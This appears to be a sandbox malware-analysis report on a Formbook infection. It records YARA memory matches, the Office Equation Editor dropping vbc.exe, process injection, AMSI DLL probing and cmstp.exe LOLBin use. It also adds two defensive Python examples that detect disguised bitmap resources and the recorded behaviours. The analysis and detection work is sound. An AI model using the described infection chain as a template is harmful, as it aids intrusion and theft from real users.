Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E9CF01
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044629C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044B47C
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F6818
Source: C:\Users\Public\vbc.exe Code function: 4_2_04305898
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249BA51
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72481030
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249C90C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72482FB0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72488C6C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72488C70
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249C43E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72482D90
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02121238
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207E2E9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02082305
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02087353
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020CA37B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207F3CF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020A63DB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020AD005
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02083040
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0209905A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207E0C6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02122622
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02084680
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208E6C1
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0210579A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208C7BC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B57C3
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020BD47D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02091489
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B5485
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208351F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020C6540
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0209C5F0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02133A83
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020A7B00
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0212CBA4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0210DBDA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207FBD7
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208C85C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020A286D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0211F8EE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02105955
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0212098E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020829B2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020969FE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B2E2F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0209EE4C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02090F3F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020ADF7C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020B0D3B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208CD5B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0211FDDD
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00296F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_002908FB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00297D02
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00290902
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_002932FF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00293302
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00291362
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00291359
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_002957B2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00556F06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_005532FF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_005508FB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00551359
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00551362
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00557D02
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00550902
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_00553302
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_005557B2
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044B47C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044629C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044B47C
PE file contains strange resources
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Esfjmbxd.exe.4.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
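The finding above means the bytes stored under a bitmap resource type were identified by content as something other than a device-independent bitmap; loaders commonly park an encrypted stage in a resource with an innocuous type. The following check is added here as an example and is not taken from the report or from any tool it names: it tests whether a blob extracted from an RT_BITMAP resource actually parses as a DIB, whether its length matches what the header implies, and whether its byte entropy looks like image data or like ciphertext. It assumes the resource bytes have already been extracted (for instance with pefile); the three inputs in SAMPLES are constructed, not the resources of vbc.exe or Esfjmbxd.exe.

```python
"""Plausibility check for bytes extracted from an RT_BITMAP resource.
Added example, not part of the report: a resource typed as a bitmap should
parse as a device-independent bitmap (DIB) and have the byte entropy of
image data, not of ciphertext. Resource bytes are assumed to have been
extracted already (for example with pefile); the inputs in SAMPLES are
constructed, not the resources of the files in this report."""
import hashlib
import math
import struct

HEADER_SIZES = {12, 40, 108, 124}   # BITMAPCOREHEADER, BITMAPINFOHEADER, V4, V5
BITCOUNTS = {0, 1, 4, 8, 16, 24, 32}
BI_RGB = 0                          # uncompressed; payload size follows from the header


def entropy(data):
    """Shannon entropy in bits per byte (8.0 means uniformly random)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def check_rt_bitmap(data, entropy_limit=7.0):
    """Return the reasons the blob does not look like a DIB; empty = plausible."""
    reasons = []
    bi_size = struct.unpack_from("<I", data, 0)[0] if len(data) >= 4 else -1
    if bi_size not in HEADER_SIZES or len(data) < bi_size:
        reasons.append("no valid DIB header (biSize=%d, %d bytes)" % (bi_size, len(data)))
    else:
        if bi_size == 12:   # BITMAPCOREHEADER: 16-bit fields, 3-byte palette entries
            width, height, planes, bitcount = struct.unpack_from("<HHHH", data, 4)
            compression, clr_used, entry = BI_RGB, 0, 3
        else:               # BITMAPINFOHEADER and the V4/V5 extensions of it
            width, height, planes, bitcount, compression = struct.unpack_from("<iiHHI", data, 4)
            clr_used, entry = struct.unpack_from("<I", data, 32)[0], 4
        if planes != 1:
            reasons.append("biPlanes=%d (must be 1)" % planes)
        if bitcount not in BITCOUNTS:
            reasons.append("biBitCount=%d is invalid" % bitcount)
        if width <= 0 or height == 0:
            reasons.append("implausible dimensions %dx%d" % (width, height))
        if not reasons and compression == BI_RGB:
            stride = ((width * bitcount + 31) // 32) * 4          # rows are DWORD-aligned
            colors = (clr_used or (1 << bitcount)) if bitcount <= 8 else 0
            expected = bi_size + entry * colors + stride * abs(height)
            if len(data) != expected:
                reasons.append("size %d bytes, header implies %d" % (len(data), expected))
    h = entropy(data)
    if h > entropy_limit:
        reasons.append("entropy %.2f bits/byte (encrypted or compressed data)" % h)
    return reasons


def make_dib(width, height, bgr):
    """Constructed single-colour 24-bit uncompressed DIB (header + pixel rows)."""
    stride = ((width * 24 + 31) // 32) * 4
    header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, BI_RGB,
                         stride * height, 2835, 2835, 0, 0)
    row = (bytes(bgr) * width).ljust(stride, b"\0")
    return header + row * height


def pseudo_random(n, seed=b"constructed payload"):
    """Deterministic high-entropy bytes standing in for an encrypted stage."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed inputs: a genuine 4x4 bitmap, a bare "payload", and a payload
# hidden behind a copied bitmap header (the size check catches the last one).
SAMPLES = {
    "real_bitmap": make_dib(4, 4, (0, 0, 255)),
    "payload_no_header": pseudo_random(4096),
    "payload_behind_header": make_dib(4, 4, (0, 0, 255))[:40] + pseudo_random(4096),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, "->", check_rt_bitmap(blob) or ["plausible bitmap"])
```

The size check matters more than the entropy check on its own: a loader that copies a real bitmap header in front of its payload still has to store the payload somewhere, and an uncompressed DIB has no room for extra bytes beyond what the header accounts for. Compressed or palette-heavy bitmaps can legitimately score above 7 bits per byte, so treat the entropy reason as a ranking signal rather than a verdict.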
Tries to load missing DLLs
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll (6 attempts)
Source: C:\Users\Public\vbc.exe Section loaded: ieproxy.dll (3 attempts)
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll (8 attempts)
Source: C:\Users\Public\vbc.exe Section loaded: amsiproxy.dll (2 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll (6 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll (3 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll (8 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsiproxy.dll (2 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll (6 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: ieproxy.dll (3 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsi.dll (8 attempts)
Source: C:\Users\user\Esfjmbxd.exe Section loaded: amsiproxy.dll (2 attempts)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page no access
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 72481000 page read and write
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page no access
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72481000 page read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page no access
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72480000 page read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: 72481000 page read and write
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\logagent.exe Memory allocated: 76E90000 page execute and read and write
Uses Windows Living Off The Land Binaries (LOLBins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
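Two behaviours recorded in this report, EQNEDT32.EXE writing vbc.exe into the Content.IE5 cache and into C:\Users\Public (and that executable then running from C:\Users\Public), and explorer.exe starting cmstp.exe, are simple to express as rules over endpoint telemetry. The following Python is an added example, not code from the report or from the sandbox: it evaluates three such rules over constructed Sysmon-style events (EventID 11 FileCreate, EventID 1 ProcessCreate) whose paths mirror the ones above. The event records, the rule names and the list of user-writable folders are assumptions made for illustration; the process-creation event for vbc.exe is modelled on the report's process tree, not copied from its raw log.

```python
"""Detection rules for behaviours recorded in this report: EQNEDT32.EXE
dropping a PE file, a process running from C:\\Users\\Public, and
explorer.exe spawning cmstp.exe. Added example; the event records are
constructed Sysmon-style dicts (EventID 1 = ProcessCreate, 11 = FileCreate),
not the sandbox's raw log."""
import re

EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events; paths follow the report, field names follow Sysmon.
EVENTS = [
    {"EventID": 11, "Image": EQNEDT,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    {"EventID": 11, "Image": EQNEDT, "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1, "ParentImage": EQNEDT, "Image": r"C:\Users\Public\vbc.exe",
     "CommandLine": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1, "ParentImage": EXPLORER, "Image": r"C:\Windows\SysWOW64\cmstp.exe",
     "CommandLine": r"C:\Windows\SysWOW64\cmstp.exe"},
    # Benign controls: Excel saving a workbook, explorer starting notepad.
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\Documents\budget.xlsx"},
    {"EventID": 1, "ParentImage": EXPLORER, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

PE_EXT = re.compile(r"\.(exe|dll|scr|com|pif)$", re.IGNORECASE)
# Folders a non-elevated dropper can write to (assumed list, lower-case).
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\", "\\temporary internet files\\")


def _name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_eqnedt_drops_pe(ev):
    """Equation Editor has no legitimate reason to write an executable anywhere."""
    if ev.get("EventID") != 11 or _name(ev.get("Image", "")) != "eqnedt32.exe":
        return None
    if not PE_EXT.search(ev.get("TargetFilename", "")):
        return None
    return "EQNEDT32.EXE wrote executable " + ev["TargetFilename"]


def rule_exec_from_user_writable(ev):
    """Process image lives in a user-writable staging folder (here C:\\Users\\Public)."""
    if ev.get("EventID") != 1:
        return None
    image = ev.get("Image", "").lower()
    if any(folder in image for folder in USER_WRITABLE):
        return "process started from user-writable folder: " + ev["Image"]
    return None


def rule_explorer_spawns_cmstp(ev):
    """explorer.exe starting cmstp.exe is how an injected explorer hands execution
    to a signed system binary; an argument-less cmstp is doubly odd, since
    legitimate use passes an .inf connection profile."""
    if ev.get("EventID") != 1 or _name(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    if _name(ev.get("Image", "")) != "cmstp.exe":
        return None
    args = ev.get("CommandLine", "").strip().lower()
    detail = "without arguments" if args.endswith("cmstp.exe") else "with arguments"
    return "explorer.exe spawned cmstp.exe " + detail


RULES = (rule_eqnedt_drops_pe, rule_exec_from_user_writable, rule_explorer_spawns_cmstp)


def evaluate(events):
    """Return (rule name, message) for every event/rule pair that fires, in order."""
    hits = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((rule.__name__, msg))
    return hits


if __name__ == "__main__":
    for name, msg in evaluate(EVENTS):
        print(name, "->", msg)
```

The cmstp rule fires on any explorer.exe to cmstp.exe relationship; the argument check only ranks the hit, since a user launching a VPN profile would produce the same parent but a command line ending in an .inf path. On the events above the four malicious records fire exactly one rule each and the two benign controls fire none.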
Yara signature match
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
